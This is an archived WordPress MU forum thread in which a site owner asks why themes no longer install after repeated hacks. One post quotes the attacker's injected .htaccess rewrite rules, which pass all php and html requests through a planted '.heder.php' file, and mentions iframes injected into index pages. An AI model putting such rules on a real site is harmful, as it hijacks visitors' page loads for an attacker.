The MU forums have moved to WordPress.org

Cannot install themes after being hacked (4 posts)

1. isolv
    Posted 14 years ago #

My site has been hacked several times and the theme folders were altered. I have re-installed the themes manually (following the instructions to the letter) but WPMU is not recognising them in the admin page neither can I browse for themes to upload them and do an automatic install. I think I have some files missing from my install is there a list of files that should be on my installation. My installation is 2.8.4a

2. VentureMaker
    Posted 14 years ago #

Emm, would be difficult to suggest anything not seeing the situation 'from inside'.

First of all, are you on shared hosting or do you have a server?
    Later, how/what was hacked? Did you restore everything from backups after the hack?

In other words, more info, please :)

3. isolv
    Posted 14 years ago #

It is a shared server at mediatemple.
    I repaired the site manually by overwriting the damaged files. htaccess had been amended as #mmmmd
    <IfModule mod_rewrite.c>
    RewriteEngine On
    RewriteCond %{REQUEST_METHOD} GET
    RewriteCond %{REQUEST_FILENAME} -f
    RewriteCond %{REQUEST_FILENAME} !.heder.php
    RewriteRule (.*)\.(php|html|htm|php3|phtml|shtml) \.heder.php?%{QUERY_STRING}&qq=$1.$2 [NC,L]
    </IfModule>
    This heder file had been placed in every folder and every index page had an iframe pointing to another website.. I suspect the hacker managed to get my ftp password from Filezilla which has now been changed and removed from filezilla.

The database is ok or appears to be but I cannot change from the classic theme even by uploading manually.

4. VentureMaker
    Posted 14 years ago #

I think it's needed to look at all that 'from inside' :)

About this Topic

• Started 14 years ago by isolv
  • Latest reply from VentureMaker